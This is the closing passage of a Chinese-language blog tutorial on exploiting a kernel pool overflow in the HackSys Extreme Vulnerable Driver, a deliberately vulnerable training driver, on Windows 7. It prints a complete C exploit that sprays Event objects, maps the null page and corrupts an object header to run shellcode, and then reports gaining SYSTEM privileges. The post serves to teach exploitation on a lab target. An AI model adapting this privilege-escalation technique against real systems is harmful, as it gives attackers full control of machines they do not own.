&#x5904;&#x7684;<code>TypeInfo</code>&#x6210;&#x5458;&#xFF1A;&#x8FD9;&#x4E2A;&#x6210;&#x5458;&#x7684;&#x6700;&#x540E;&#x90E8;&#x5206;&#x6709;&#x4E00;&#x4E9B;&#x7A0B;&#x5E8F;&#x8C03;&#x7528;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x4ECE;&#x63D0;&#x4F9B;&#x7684;&#x7A0B;&#x5E8F;&#x4E2D;&#x6311;&#x9009;&#x4EE5;&#x4F9B;&#x5DF1;&#x7528;&#xFF0C;&#x5728;&#x8FD9;&#x9009;&#x62E9;0x038&#x5904;&#x7684; <code>CloseProcedure</code>CloseProcedure &#x7684;&#x504F;&#x79FB;&#x91CF;&#x4E3A; 0x28 + 0x38 = 0x60&#x6211;&#x4EEC;&#x4F1A;&#x8986;&#x76D6;0x60&#x5904;&#x7684;&#x8FD9;&#x4E2A;&#x6307;&#x9488;&#xFF0C;&#x8BA9;&#x5B83;&#x6307;&#x5411;&#x6211;&#x4EEC;&#x7684;shellcode&#x5730;&#x5740;&#xFF0C;&#x7136;&#x540E;&#x8C03;&#x7528;CloseProcedure&#x65B9;&#x6CD5;&#xFF0C;&#x4ECE;&#x800C;&#x6700;&#x7EC8;&#x6267;&#x884C;&#x6211;&#x4EEC;&#x7684;shellcode&#x3002;</p>
<p>&#x6211;&#x4EEC;&#x7684;&#x76EE;&#x6807;&#x662F;&#x628A;<code>TypeIndex</code>&#x7684;&#x504F;&#x79FB;&#x91CF;&#x4ECE;0xc&#x6539;&#x4E3A;0x0&#xFF0C;&#x56E0;&#x4E3A;&#x7B2C;&#x4E00;&#x4E2A;&#x6307;&#x9488;&#x662F;&#x7A7A;&#x6307;&#x9488;&#xFF0C;&#x5728;Windows 7 &#x4E2D;&#x6709;&#x4E00;&#x4E2A;&#x6F0F;&#x6D1E;&#xFF0C;&#x53EF;&#x4EE5;&#x8C03;&#x7528; <a href="https://bbs.pediy.com/ntallocatevitualmemory" target="_blank" rel="noopener">NtAllocateVirtualMemory</a>&#x6765;&#x6620;&#x5C04;&#x5230;Null&#x9875;&#x9762;&#xFF1A;</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">NTSTATUS ZwAllocateVirtualMemory(</span><br><span class="line">  <span class="variable">_In_</span>    HANDLE    ProcessHandle,</span><br><span class="line">  <span class="variable">_Inout_</span> PVOID     *BaseAddress,</span><br><span class="line">  <span class="variable">_In_</span>    ULONG_PTR ZeroBits,</span><br><span class="line">  <span class="variable">_Inout_</span> PSIZE_T   RegionSize,</span><br><span class="line">  <span class="variable">_In_</span>    ULONG     AllocationType,</span><br><span class="line">  <span class="variable">_In_</span>    ULONG     Protect</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>&#x7136;&#x540E;&#x8C03;&#x7528;<a href="https://bbs.pediy.com/writeprocessmemory" target="_blank" rel="noopener">WriteProcessMemory</a> &#x8986;&#x76D6;0x60&#x5904;&#x7684;&#x6307;&#x9488;&#xFF0C;&#x6307;&#x5411;shellcode&#x5730;&#x5740;:</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">BOOL WINAPI WriteProcessMemory(</span><br><span class="line">  <span class="variable">_In_</span>  HANDLE  hProcess,</span><br><span class="line">  <span class="variable">_In_</span>  LPVOID  lpBaseAddress,</span><br><span class="line">  <span class="variable">_In_</span>  LPCVOID lpBuffer,</span><br><span class="line">  <span class="variable">_In_</span>  SIZE_T  nSize,</span><br><span class="line">  <span class="variable">_Out_</span> SIZE_T  *lpNumberOfBytesWritten</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>&#x6574;&#x5408;&#x4E4B;&#x540E;&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#xFF1A;</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;iostream&gt;</span><br><span class="line">#include&lt;windows.h&gt;</span><br><span class="line">using namespace std;</span><br><span class="line"></span><br><span class="line">#define NTSTATUS long</span><br><span class="line"></span><br><span class="line">typedef NTSTATUS (WINAPI* ZWALLOCATEVIRTUALMEMORY)(</span><br><span class="line">   HANDLE    ProcessHandle,</span><br><span class="line">   PVOID     *BaseAddress,</span><br><span class="line">   ULONG ZeroBits,</span><br><span class="line">   PSIZE_T   RegionSize,</span><br><span class="line">   ULONG     AllocationType,</span><br><span class="line">   ULONG     Protect</span><br><span class="line">);</span><br><span class="line">    HANDLE    EventObjectArrayA[<span class="number">10000</span>];</span><br><span class="line">    HANDLE    EventObjectArrayB[<span class="number">5000</span>];</span><br><span class="line"></span><br><span class="line">int main(){</span><br><span class="line">    HANDLE hevDevice;</span><br><span class="line">    ULONG BytesReturned = <span class="number">100</span>;</span><br><span class="line">    </span><br><span class="line">    hevDevice = (HANDLE)CreateFileA(<span class="string">&quot;<span class="subst">\\</span><span class="subst">\\</span>.<span class="subst">\\</span>HackSysExtremeVulnerableDriver&quot;</span>, <span class="number">0xC0000000</span>, <span class="number">0</span>, NULL, <span class="number">0x3</span>, <span class="number">0</span>, NULL);</span><br><span class="line">    </span><br><span class="line">    if(!hevDevice || hevDevice == (HANDLE)<span class="number">-1</span>)</span><br><span class="line">    {</span><br><span class="line">        printf(<span class="string">&quot;*** Couldn&apos;t get Device Driver handle&quot;</span>);</span><br><span class="line">    <span class="comment">//  exit(-1);</span></span><br><span class="line">    }</span><br><span class="line">    ZWALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(LoadLibrary(<span class="string">&quot;ntdll.dll&quot;</span>),<span class="string">&quot;NtAllocateVirtualMemory&quot;</span>);</span><br><span class="line">    PVOID v1 =(PVOID)<span class="number">-1</span>;</span><br><span class="line">    NTSTATUS Status = NtAllocateVirtualMemory((HANDLE)<span class="number">0xFFFFFFFF</span>,&amp;v1,<span class="number">0</span>,&amp;BytesReturned,<span class="number">0x3000</span>,<span class="number">0x40</span>);</span><br><span class="line">    char shellcode[<span class="number">0x60</span>]={<span class="number">0</span>};</span><br><span class="line">    memset(shellcode,<span class="number">0x90</span>,<span class="number">8</span>);</span><br><span class="line">    PVOID shellcodeAddress = shellcode+<span class="number">20</span>;</span><br><span class="line">    WriteProcessMemory((HANDLE)<span class="number">0xFFFFFFFF</span>,(void*)<span class="number">0x60</span>,&amp;shellcodeAddress,<span class="number">0x4</span>,&amp;BytesReturned);</span><br><span class="line">    char buf[<span class="number">544</span>];</span><br><span class="line">    memset(buf,&apos;A&apos;,<span class="number">504</span>);</span><br><span class="line">    </span><br><span class="line">    PVOID Memory = (PVOID)((ULONG)buf + <span class="number">504</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x04080040</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0xee657645</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000040</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000001</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000001</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00000000</span>;</span><br><span class="line">    Memory = (PVOID)((ULONG)Memory + <span class="number">0x4</span>);</span><br><span class="line">    *(PULONG)Memory = (ULONG)<span class="number">0x00080000</span>;</span><br><span class="line">    </span><br><span class="line">    UINT32 i = <span class="number">0</span>;</span><br><span class="line">    UINT32 j = <span class="number">0</span>;</span><br><span class="line">    for (i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) {</span><br><span class="line">        EventObjectArrayA[i] = CreateEvent(NULL, <span class="literal">FALSE</span>, <span class="literal">FALSE</span>, NULL);</span><br><span class="line">        </span><br><span class="line">        if (!EventObjectArrayA[i]) {</span><br><span class="line">    <span class="comment">//      exit(EXIT_FAILURE);</span></span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">    </span><br><span class="line">    for (i = <span class="number">0</span>; i &lt; <span class="number">5000</span>; i++) {</span><br><span class="line">        EventObjectArrayB[i] = CreateEvent(NULL, <span class="literal">FALSE</span>, <span class="literal">FALSE</span>, NULL);</span><br><span class="line">        </span><br><span class="line">        if (!EventObjectArrayB[i]) {</span><br><span class="line">    <span class="comment">//      exit(EXIT_FAILURE);</span></span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">    </span><br><span class="line">     for (i = <span class="number">0</span>; i &lt; <span class="number">5000</span>; i += <span class="number">16</span>) {</span><br><span class="line">        for (j = <span class="number">0</span>; j &lt; <span class="number">8</span>; j++) {</span><br><span class="line">            if (!CloseHandle(EventObjectArrayB[i + j])) {</span><br><span class="line">             </span><br><span class="line">     <span class="comment">//           exit(EXIT_FAILURE);</span></span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    int bufLength = strlen(buf);</span><br><span class="line">    DeviceIoControl(hevDevice, <span class="number">0x22200f</span>, buf+<span class="number">20</span>, bufLength, NULL, <span class="number">0</span>, &amp;BytesReturned, NULL);</span><br><span class="line">    return <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x6D4B;&#x8BD5;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/11.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>&#x6709;&#x6F0F;&#x6D1E;&#x7684;&#x7F13;&#x51B2;&#x533A;&#x73B0;&#x5728;&#x4F4D;&#x4E8E;&#x6211;&#x4EEC;&#x521B;&#x5EFA;&#x7684;<code>Event</code>&#x5BF9;&#x8C61;&#x4E4B;&#x95F4;&#x7684;&#x7A7A;&#x9699;&#x4E2D;&#x3002;</p>
<p><img src="/2019/08/03/20190803-1/12.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p><code>TypeIndex</code>&#x7531; 0xc &#x4FEE;&#x6539;&#x4E3A; 0x0</p>
<p><img src="/2019/08/03/20190803-1/13.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>shellcode&#x5730;&#x5740;&#x5E03;&#x7F6E;&#x5B8C;&#x6210;&#xFF01;</p>
<p>&#x73B0;&#x5728;&#xFF0C;&#x53EA;&#x9700;&#x8981;&#x8C03;&#x7528; <code>Closeprocedure</code>&#xFF0C;&#x5728; &#x865A;&#x62DF;&#x5185;&#x5B58;&#x4E2D; &#x52A0;&#x8F7D;shellcode&#xFF0C; shellcode&#x5E94;&#x8BE5;&#x5B8C;&#x7F8E;&#x8FD0;&#x884C;&#x3002;Payload&#x53C2;&#x89C1;&#x8FD9;&#x91CC;&#x3002;</p>
<p><img src="/2019/08/03/20190803-1/14.png" alt="&#xE5;&#x9B;&#xBE;&#xE7;&#x89;&#x87;&#xE6;&#x8F;&#x8F;&#xE8;&#xBF;&#xB0;"></p>
<p>&#x6267;&#x884C;&#x5F97;&#x5230;&#x7CFB;&#x7EDF;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/15.gif" alt="img"></p>
<h5 id="0x03-&#x6F0F;&#x6D1E;&#x53CD;&#x601D;"><a href="#0x03-&#x6F0F;&#x6D1E;&#x53CD;&#x601D;" class="headerlink" title="0x03 &#x6F0F;&#x6D1E;&#x53CD;&#x601D;"></a>0x03 &#x6F0F;&#x6D1E;&#x53CD;&#x601D;</h5><p>&#x8FD1;&#x4E9B;&#x5E74;&#x6C60;&#x6EA2;&#x51FA;&#x65B9;&#x9762;&#x7684;&#x6F0F;&#x6D1E;&#x597D;&#x50CF;&#x5F88;&#x5C11;&#x7206;&#x51FA;&#x6765;&#xFF0C;&#x4E0D;&#x7BA1;&#x600E;&#x4E48;&#x8BF4;&#xFF0C;&#x5148;&#x5927;&#x6982;&#x4E86;&#x89E3;&#x4E00;&#x54C8;&#x5427;&#x3002;</p>
<h5 id="0x04-&#x94FE;&#x63A5;"><a href="#0x04-&#x94FE;&#x63A5;" class="headerlink" title="0x04 &#x94FE;&#x63A5;"></a>0x04 &#x94FE;&#x63A5;</h5><p>&#x8FD9;&#x7BC7;&#x4E3B;&#x8981;&#x53C2;&#x8003;fyb&#x6CE2;&#x5E08;&#x5085;&#x7684;&#x7684;&#x6587;&#x7AE0;&#xFF1A;<a href="https://bbs.pediy.com/thread-223719.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-223719.htm</a></p>
<p>rootkit&#x539F;&#x6587;&#x94FE;&#x63A5;&#xFF1A;<a href="https://rootkits.xyz/blog/2017/11/kernel-pool-overflow/" target="_blank" rel="noopener">https://rootkits.xyz/blog/2017/11/kernel-pool-overflow/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Pool-Overflow/" rel="tag"># Pool Overflow</a>
          
        </div>
      
      <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2019/08/03/20190803-1/">[06] HEVD 内核漏洞之池溢出</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 Saturn35 的个人博客">Saturn35</a></p>
  <p><span>发布时间:</span>2019年08月03日 - 21:34</p>
  <p><span>最后更新:</span>2019年12月28日 - 13:22</p>
  <p><span>原始链接:</span><a href="/2019/08/03/20190803-1/" title="[06] HEVD 内核漏洞之池溢出">https://saturn35.github.io/2019/08/03/20190803-1/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://saturn35.github.io/2019/08/03/20190803-1/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
    });
    });  
</script>

      
      </div>
      
      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/26/20190726-2/" rel="next" title="[05] HEVD 内核漏洞之未初始化栈变量">
                <i class="fa fa-chevron-left"></i> [05] HEVD 内核漏洞之未初始化栈变量
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/12/20190812-1/" rel="prev" title="CVE-2018-8174：从UAF到任意地址读写">
                CVE-2018-8174：从UAF到任意地址读写 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  




        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.jpg" alt="Saturn35">
            
              <p class="site-author-name" itemprop="name">Saturn35</p>
              <p class="site-description motion-element" itemprop="description">心诚求之，虽不中，不远矣。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">25</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Saturn35" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:zyty718@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/sat0rnzy" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://bbs.pediy.com/user-home-831334.htm" target="_blank" title="kanxue">
                      
                        <i class="fa fa-fw fa-book"></i>kanxue</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-5"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#0x01漏洞原理"><span class="nav-number">2.</span> <span class="nav-text">0x01漏洞原理</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#池风水"><span class="nav-number">2.1.</span> <span class="nav-text">池风水</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#分析"><span class="nav-number">2.2.</span> <span class="nav-text">分析</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#0x02漏洞利用"><span class="nav-number">3.</span> <span class="nav-text">0x02漏洞利用</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#0x03-漏洞反思"><span class="nav-number">4.</span> <span class="nav-text">0x03 漏洞反思</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#0x04-链接"><span class="nav-number">5.</span> <span class="nav-text">0x04 链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Saturn35</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">101.9k</span>
  
</div>











        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: true,
        appId: '1fB9JY8xOQdkT8o7B5JMLEK4-MdYXbMMI',
        appKey: 'I5Me1NOQdPHTJgK0ELfVmocG',
        placeholder: 'Comment here...',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  

  

  
  

  

  

  


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>

<script type="text/javascript" src="/js/src/click_show_text.js"></script>

<script type="text/javascript" src="/js/src/FunnyTitle.js"></script>